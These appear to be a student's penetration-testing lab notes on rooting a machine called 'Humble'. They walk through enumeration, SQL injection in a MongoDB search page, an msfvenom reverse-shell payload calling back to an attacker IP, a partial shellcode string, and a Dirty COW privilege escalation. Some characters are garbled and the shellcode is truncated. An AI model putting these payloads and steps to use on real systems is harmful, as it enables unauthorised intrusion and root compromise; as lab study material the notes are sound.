š 10.11.1.237 (Humble) ī²ī nmap shows that there are http and https, both show different webpages ī³ī gobuster found sus directory /web1 on the https webpage, seems like it contains a user and hashed password 3. gobuster also found /test which allows user to search against the database which might be vulnerable to SQL injection 4. giving it a " ' " character made it throw an error, should be vuln to sql injection 5. it also gives the mongodb version 2.2.3, a google search reveals a potential reverse shell vulnerability https://www.exploit-db.com/exploits/24947 6. the exploit states that it requires a javascript payload in shellcode, used msfvenom generate payload msfvenom -p linux/x86/shell_reverse_tcp LHOSTī192.168.119.218 LPORTī1234 CMDī/bin/bash -f js_le -e generic/none 7. after 10000 years of modifying the payload, finally made it work (stuck on not removing the collection.find({'$where':') aaaa'; shellcode=unescape("%udb31%ue3f7%u4353%u6a53%u8902%ub0e1%ucd66%u9380%ub059%ucd3f%u4980%uf979%uc068%u77a8%u68da%u0002%ud204%ue189%u66 8. obtained reverse shell, mongodb 9. We realise that the kernel version is quite old, might be vuln to dirty cow 10.11.1.237 īHumble) 1 (for debian distros, it was only fixed on 3.16.36 and the this machine's version is 3.2.0, so it should be vulnerable 10. Run dirtycow exploit and get root shell 11. get proof 10.11.1.237 īHumble) 2
Enter the password to open this PDF file:
-
-
-
-
-
-
-
-
-
-
-
-